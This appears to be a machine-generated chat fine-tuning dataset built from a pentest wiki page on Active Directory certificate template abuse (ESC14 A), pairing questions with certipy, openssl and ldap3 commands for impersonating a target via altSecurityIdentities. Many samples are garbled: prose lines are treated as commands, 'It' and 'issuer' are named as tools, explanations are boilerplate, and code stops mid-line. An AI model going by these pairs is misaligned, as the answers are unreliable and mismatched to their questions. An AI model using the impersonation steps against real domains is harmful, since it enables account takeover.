\"dc=domain,dc=local\"", "metadata": {"corpus_index": 102, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Get ACEs of all AD objects under domain root by piping them into Get-WriteAltSecIDACEs work?"}, {"role": "assistant", "content": "Get-ADObject -Filter * -SearchBase \"dc=domain,dc=local\" | Get-WriteAltSecIDACEs\n``\n\nIt is also possible to view the necessary DACL in BloodHound.\n\n:::\n\nDetection of weak explicit mapping can be done like this :\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, with the GetWeakExplicitMappings.py script (Python).\n\n`bash\npython3 GetWeakExplicitMappings.py -dc-host $DC_HOST -u $USERNAME -p $PASSWORD -domain $DOMAIN\n`\n\n=== Windows\n\nFrom a Windows machine, with the Get-AltSecIDMapping.ps1 script (PowerShell).\n\n`powershell\nGet-AltSecIDMapping -SearchBase \"CN=Users,DC=domain,DC=local\"\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Get ACEs of all AD objects under domain root by piping them into Get-WriteAltSecIDACEs work?", "response": "Get-ADObject -Filter * -SearchBase \"dc=domain,dc=local\" | Get-WriteAltSecIDACEs\n``\n\nIt is also possible to view the necessary DACL in BloodHound.\n\n:::\n\nDetection of weak explicit mapping can be done like this :\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, with the GetWeakExplicitMappings.py script (Python).\n\n`bash\npython3 GetWeakExplicitMappings.py -dc-host $DC_HOST -u $USERNAME -p $PASSWORD -domain $DOMAIN\n`\n\n=== Windows\n\nFrom a Windows machine, with the Get-AltSecIDMapping.ps1 script (PowerShell).\n\n`powershell\nGet-AltSecIDMapping -SearchBase \"CN=Users,DC=domain,DC=local\"\n``\n\n:::", "metadata": {"corpus_index": 103, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Get ACEs of all AD objects under domain root by piping them into Get-WriteAltSecIDACEs during a pentest?"}, {"role": "assistant", "content": "Get-ADObject -Filter * -SearchBase \"dc=domain,dc=local\" | Get-WriteAltSecIDACEs\n``\n\nIt is also possible to view the necessary DACL in BloodHound.\n\n:::\n\nDetection of weak explicit mapping can be done like this :\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, with the GetWeakExplicitMappings.py script (Python).\n\n`bash\npython3 GetWeakExplicitMappings.py -dc-host $DC_HOST -u $USERNAME -p $PASSWORD -domain $DOMAIN\n`\n\n=== Windows\n\nFrom a Windows machine, with the Get-AltSecIDMapping.ps1 script (PowerShell).\n\n`powershell\nGet-AltSecIDMapping -SearchBase \"CN=Users,DC=domain,DC=local\"\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Get ACEs of all AD objects under domain root by piping them into Get-WriteAltSecIDACEs during a pentest?", "response": "Get-ADObject -Filter * -SearchBase \"dc=domain,dc=local\" | Get-WriteAltSecIDACEs\n``\n\nIt is also possible to view the necessary DACL in BloodHound.\n\n:::\n\nDetection of weak explicit mapping can be done like this :\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, with the GetWeakExplicitMappings.py script (Python).\n\n`bash\npython3 GetWeakExplicitMappings.py -dc-host $DC_HOST -u $USERNAME -p $PASSWORD -domain $DOMAIN\n`\n\n=== Windows\n\nFrom a Windows machine, with the Get-AltSecIDMapping.ps1 script (PowerShell).\n\n`powershell\nGet-AltSecIDMapping -SearchBase \"CN=Users,DC=domain,DC=local\"\n``\n\n:::", "metadata": {"corpus_index": 103, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the It command for get aces of all ad objects under domain root by piping them into get-writealtsecidaces"}, {"role": "assistant", "content": "It is also possible to view the necessary DACL in BloodHound.\n\n:::\n\n\nDetection of weak explicit mapping can be done like this :\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, with the [GetWeakExplicitMappings.py](https://github.com/3C4D/GetWeakExplicitMappings/blob/main/GetWeakExplicitMappings.py) script (Python)."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the It command for get aces of all ad objects under domain root by piping them into get-writealtsecidaces", "response": "It is also possible to view the necessary DACL in BloodHound.\n\n:::\n\n\nDetection of weak explicit mapping can be done like this :\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, with the [GetWeakExplicitMappings.py](https://github.com/3C4D/GetWeakExplicitMappings/blob/main/GetWeakExplicitMappings.py) script (Python).", "metadata": {"corpus_index": 104, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "It"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Get ACEs of all AD objects under domain root by piping them into Get-WriteAltSecIDACEs?"}, {"role": "assistant", "content": "It is also possible to view the necessary DACL in BloodHound.\n\n:::\n\n\nDetection of weak explicit mapping can be done like this :\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, with the [GetWeakExplicitMappings.py](https://github.com/3C4D/GetWeakExplicitMappings/blob/main/GetWeakExplicitMappings.py) script (Python)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Get ACEs of all AD objects under domain root by piping them into Get-WriteAltSecIDACEs?", "response": "It is also possible to view the necessary DACL in BloodHound.\n\n:::\n\n\nDetection of weak explicit mapping can be done like this :\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, with the [GetWeakExplicitMappings.py](https://github.com/3C4D/GetWeakExplicitMappings/blob/main/GetWeakExplicitMappings.py) script (Python).", "metadata": {"corpus_index": 104, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `It is also possible to view the necessary DACL in BloodHound.`?"}, {"role": "assistant", "content": "This command is used for get aces of all ad objects under domain root by piping them into get-writealtsecidaces. Get ACEs of all AD objects under domain root by piping them into Get-WriteAltSecIDACEs"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `It is also possible to view the necessary DACL in BloodHound.`?", "response": "This command is used for get aces of all ad objects under domain root by piping them into get-writealtsecidaces. Get ACEs of all AD objects under domain root by piping them into Get-WriteAltSecIDACEs", "metadata": {"corpus_index": 104, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Get ACEs of all AD objects under domain root by piping them into Get-WriteAltSecIDACEs during a pentest?"}, {"role": "assistant", "content": "=== Windows\n\nFrom a Windows machine, with the [Get-AltSecIDMapping.ps1](https://github.com/JonasBK/Powershell/blob/master/Get-AltSecIDMapping.ps1) script (PowerShell)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Get ACEs of all AD objects under domain root by piping them into Get-WriteAltSecIDACEs during a pentest?", "response": "=== Windows\n\nFrom a Windows machine, with the [Get-AltSecIDMapping.ps1](https://github.com/JonasBK/Powershell/blob/master/Get-AltSecIDMapping.ps1) script (PowerShell).", "metadata": {"corpus_index": 105, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for get aces of all ad objects under domain root by piping them into get-writealtsecidaces. Get ACEs of all AD objects under domain root by piping them into Get-WriteAltSecIDACEs"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for get aces of all ad objects under domain root by piping them into get-writealtsecidaces. Get ACEs of all AD objects under domain root by piping them into Get-WriteAltSecIDACEs", "metadata": {"corpus_index": 105, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Certificate templates - (ESC14 A) Write access on altSecurityIdentities"}, {"role": "assistant", "content": "The attacker has write access to the altSecurityIdentities attribute of the target. He can enrol on a certificate as the victim and create an explicit mapping for the target by modifying its altSecurityIdentities attribute and pointing it to the obtained certificate. The certificate can then be used to authenticate as the target.\n\nWrite rights to altSecurityIdentities can be obtained via the following DACL:\n\n- Write property altSecurityIdentities\n- Write property Public-Information\n- Write property (all)\n- WriteDACL\n- WriteOwner\n- GenericWrite\n- GenericAll\n- Owner\n\nFor PKINIT authentication, no additional requirements are necessary. For Schannel authentication, the CertificateMappingMethods key must be set to 0x8 (default value).\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, with certipy, it is possible to enroll on a certificate template.\n\n``bash\ncertipy req -u $TARGET@$DOMAIN -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP\n`\n\nThen, using certipy, we can get the certificate out of the pfx file.\n\n`bash\ncertipy cert -pfx target.pfx -nokey -out \"target.crt\"\n`\n\nopenssl can be used to extract the \"Issuer\" and the \"Serial Number\" value out of the certificate.\n\n`bash\nopenssl x509 -in target.crt -noout -text\n`\n\nWith the following python script (inspired from this script), we can use the previously dumped values to craft a X509IssuerSerialNumber mapping string.\n\n`python\nissuer = \",\".join(\"\".split(\",\")[::-1])\nserial = \"\".join(\"\".split(\":\")[::-1])\n\nprint(\"X509:\"+issuer+\"\"+serial)\n`\n\nthe string can then be added to altSecurityIdentities target's attribute with the following python script.\n\n`python\nimport ldap3\n\nserver = ldap3.Server('')\nvictim_dn = \"\"\nattacker_username = \"\\\\\"\nattacker_password = \"\"\n\nconn = ldap3.Connection(\n server=server,\n user=attacker_username,\n password=attacker_password,\n authentication=ldap3.NTLM\n)\nconn.bind()\n\nconn.modify(\n victim_d"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Certificate templates - (ESC14 A) Write access on altSecurityIdentities", "response": "The attacker has write access to the altSecurityIdentities attribute of the target. He can enrol on a certificate as the victim and create an explicit mapping for the target by modifying its altSecurityIdentities attribute and pointing it to the obtained certificate. The certificate can then be used to authenticate as the target.\n\nWrite rights to altSecurityIdentities can be obtained via the following DACL:\n\n- Write property altSecurityIdentities\n- Write property Public-Information\n- Write property (all)\n- WriteDACL\n- WriteOwner\n- GenericWrite\n- GenericAll\n- Owner\n\nFor PKINIT authentication, no additional requirements are necessary. For Schannel authentication, the CertificateMappingMethods key must be set to 0x8 (default value).\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, with certipy, it is possible to enroll on a certificate template.\n\n``bash\ncertipy req -u $TARGET@$DOMAIN -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP\n`\n\nThen, using certipy, we can get the certificate out of the pfx file.\n\n`bash\ncertipy cert -pfx target.pfx -nokey -out \"target.crt\"\n`\n\nopenssl can be used to extract the \"Issuer\" and the \"Serial Number\" value out of the certificate.\n\n`bash\nopenssl x509 -in target.crt -noout -text\n`\n\nWith the following python script (inspired from this script), we can use the previously dumped values to craft a X509IssuerSerialNumber mapping string.\n\n`python\nissuer = \",\".join(\"\".split(\",\")[::-1])\nserial = \"\".join(\"\".split(\":\")[::-1])\n\nprint(\"X509:\"+issuer+\"\"+serial)\n`\n\nthe string can then be added to altSecurityIdentities target's attribute with the following python script.\n\n`python\nimport ldap3\n\nserver = ldap3.Server('')\nvictim_dn = \"\"\nattacker_username = \"\\\\\"\nattacker_password = \"\"\n\nconn = ldap3.Connection(\n server=server,\n user=attacker_username,\n password=attacker_password,\n authentication=ldap3.NTLM\n)\nconn.bind()\n\nconn.modify(\n victim_d", "metadata": {"corpus_index": 106, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Certificate templates - (ESC14 A) Write access on altSecurityIdentities during a pentest?"}, {"role": "assistant", "content": "The attacker has write access to the altSecurityIdentities attribute of the target. He can enrol on a certificate as the victim and create an explicit mapping for the target by modifying its altSecurityIdentities attribute and pointing it to the obtained certificate. The certificate can then be used to authenticate as the target.\n\nWrite rights to altSecurityIdentities can be obtained via the following DACL:\n\n- Write property altSecurityIdentities\n- Write property Public-Information\n- Write property (all)\n- WriteDACL\n- WriteOwner\n- GenericWrite\n- GenericAll\n- Owner\n\nFor PKINIT authentication, no additional requirements are necessary. For Schannel authentication, the CertificateMappingMethods key must be set to 0x8 (default value).\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, with certipy, it is possible to enroll on a certificate template.\n\n``bash\ncertipy req -u $TARGET@$DOMAIN -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP\n`\n\nThen, using certipy, we can get the certificate out of the pfx file.\n\n`bash\ncertipy cert -pfx target.pfx -nokey -out \"target.crt\"\n`\n\nopenssl can be used to extract the \"Issuer\" and the \"Serial Number\" value out of the certificate.\n\n`bash\nopenssl x509 -in target.crt -noout -text\n`\n\nWith the following python script (inspired from this script), we can use the previously dumped values to craft a X509IssuerSerialNumber mapping string.\n\n`python\nissuer = \",\".join(\"\".split(\",\")[::-1])\nserial = \"\".join(\"\".split(\":\")[::-1])\n\nprint(\"X509:\"+issuer+\"\"+serial)\n`\n\nthe string can then be added to altSecurityIdentities target's attribute with the following python script.\n\n`python\nimport ldap3\n\nserver = ldap3.Server('')\nvictim_dn = \"\"\nattacker_username = \"\\\\\"\nattacker_password = \"\"\n\nconn = ldap3.Connection(\n server=server,\n user=attacker_username,\n password=attacker_password,\n authentication=ldap3.NTLM\n)\nconn.bind()\n\nconn.modify(\n victim_d"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Certificate templates - (ESC14 A) Write access on altSecurityIdentities during a pentest?", "response": "The attacker has write access to the altSecurityIdentities attribute of the target. He can enrol on a certificate as the victim and create an explicit mapping for the target by modifying its altSecurityIdentities attribute and pointing it to the obtained certificate. The certificate can then be used to authenticate as the target.\n\nWrite rights to altSecurityIdentities can be obtained via the following DACL:\n\n- Write property altSecurityIdentities\n- Write property Public-Information\n- Write property (all)\n- WriteDACL\n- WriteOwner\n- GenericWrite\n- GenericAll\n- Owner\n\nFor PKINIT authentication, no additional requirements are necessary. For Schannel authentication, the CertificateMappingMethods key must be set to 0x8 (default value).\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, with certipy, it is possible to enroll on a certificate template.\n\n``bash\ncertipy req -u $TARGET@$DOMAIN -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP\n`\n\nThen, using certipy, we can get the certificate out of the pfx file.\n\n`bash\ncertipy cert -pfx target.pfx -nokey -out \"target.crt\"\n`\n\nopenssl can be used to extract the \"Issuer\" and the \"Serial Number\" value out of the certificate.\n\n`bash\nopenssl x509 -in target.crt -noout -text\n`\n\nWith the following python script (inspired from this script), we can use the previously dumped values to craft a X509IssuerSerialNumber mapping string.\n\n`python\nissuer = \",\".join(\"\".split(\",\")[::-1])\nserial = \"\".join(\"\".split(\":\")[::-1])\n\nprint(\"X509:\"+issuer+\"\"+serial)\n`\n\nthe string can then be added to altSecurityIdentities target's attribute with the following python script.\n\n`python\nimport ldap3\n\nserver = ldap3.Server('')\nvictim_dn = \"\"\nattacker_username = \"\\\\\"\nattacker_password = \"\"\n\nconn = ldap3.Connection(\n server=server,\n user=attacker_username,\n password=attacker_password,\n authentication=ldap3.NTLM\n)\nconn.bind()\n\nconn.modify(\n victim_d", "metadata": {"corpus_index": 106, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the certipy command to certificate templates - (esc14 a) write access on altsecurityidentities"}, {"role": "assistant", "content": "certipy req -u $TARGET@$DOMAIN -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the certipy command to certificate templates - (esc14 a) write access on altsecurityidentities", "response": "certipy req -u $TARGET@$DOMAIN -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP", "metadata": {"corpus_index": 107, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Certificate templates - (ESC14 A) Write access on altSecurityIdentities?"}, {"role": "assistant", "content": "certipy req -u $TARGET@$DOMAIN -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Certificate templates - (ESC14 A) Write access on altSecurityIdentities?", "response": "certipy req -u $TARGET@$DOMAIN -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP", "metadata": {"corpus_index": 107, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy req -u $TARGET@$DOMAIN -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc14 a) write access on altsecurityidentities. (ESC14 A) Write access on altSecurityIdentities"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy req -u $TARGET@$DOMAIN -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP`?", "response": "This command is used for certificate templates - (esc14 a) write access on altsecurityidentities. (ESC14 A) Write access on altSecurityIdentities", "metadata": {"corpus_index": 107, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use certipy for certificate templates - (esc14 a) write access on altsecurityidentities?"}, {"role": "assistant", "content": "certipy cert -pfx target.pfx -nokey -out \"target.crt\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use certipy for certificate templates - (esc14 a) write access on altsecurityidentities?", "response": "certipy cert -pfx target.pfx -nokey -out \"target.crt\"", "metadata": {"corpus_index": 108, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Certificate templates - (ESC14 A) Write access on altSecurityIdentities"}, {"role": "assistant", "content": "certipy cert -pfx target.pfx -nokey -out \"target.crt\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Certificate templates - (ESC14 A) Write access on altSecurityIdentities", "response": "certipy cert -pfx target.pfx -nokey -out \"target.crt\"", "metadata": {"corpus_index": 108, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy cert -pfx target.pfx -nokey -out \"target.crt\"`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc14 a) write access on altsecurityidentities. (ESC14 A) Write access on altSecurityIdentities"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy cert -pfx target.pfx -nokey -out \"target.crt\"`?", "response": "This command is used for certificate templates - (esc14 a) write access on altsecurityidentities. (ESC14 A) Write access on altSecurityIdentities", "metadata": {"corpus_index": 108, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the openssl command to certificate templates - (esc14 a) write access on altsecurityidentities"}, {"role": "assistant", "content": "openssl x509 -in target.crt -noout -text"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the openssl command to certificate templates - (esc14 a) write access on altsecurityidentities", "response": "openssl x509 -in target.crt -noout -text", "metadata": {"corpus_index": 109, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "openssl"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Certificate templates - (ESC14 A) Write access on altSecurityIdentities"}, {"role": "assistant", "content": "openssl x509 -in target.crt -noout -text"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Certificate templates - (ESC14 A) Write access on altSecurityIdentities", "response": "openssl x509 -in target.crt -noout -text", "metadata": {"corpus_index": 109, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `openssl x509 -in target.crt -noout -text`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc14 a) write access on altsecurityidentities. (ESC14 A) Write access on altSecurityIdentities"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `openssl x509 -in target.crt -noout -text`?", "response": "This command is used for certificate templates - (esc14 a) write access on altsecurityidentities. (ESC14 A) Write access on altSecurityIdentities", "metadata": {"corpus_index": 109, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the issuer command to certificate templates - (esc14 a) write access on altsecurityidentities"}, {"role": "assistant", "content": "issuer = \",\".join(\"\".split(\",\")[::-1])\nserial = \"\".join(\"\".split(\":\")[::-1])\n\nprint(\"X509:\"+issuer+\"\"+serial)"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the issuer command to certificate templates - (esc14 a) write access on altsecurityidentities", "response": "issuer = \",\".join(\"\".split(\",\")[::-1])\nserial = \"\".join(\"\".split(\":\")[::-1])\n\nprint(\"X509:\"+issuer+\"\"+serial)", "metadata": {"corpus_index": 110, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "issuer"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Certificate templates - (ESC14 A) Write access on altSecurityIdentities"}, {"role": "assistant", "content": "issuer = \",\".join(\"\".split(\",\")[::-1])\nserial = \"\".join(\"\".split(\":\")[::-1])\n\nprint(\"X509:\"+issuer+\"\"+serial)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Certificate templates - (ESC14 A) Write access on altSecurityIdentities", "response": "issuer = \",\".join(\"\".split(\",\")[::-1])\nserial = \"\".join(\"\".split(\":\")[::-1])\n\nprint(\"X509:\"+issuer+\"\"+serial)", "metadata": {"corpus_index": 110, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `issuer = \",\".join(\"\".split(\",\")[::-1])`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc14 a) write access on altsecurityidentities. (ESC14 A) Write access on altSecurityIdentities"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `issuer = \",\".join(\"\".split(\",\")[::-1])`?", "response": "This command is used for certificate templates - (esc14 a) write access on altsecurityidentities. (ESC14 A) Write access on altSecurityIdentities", "metadata": {"corpus_index": 110, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step 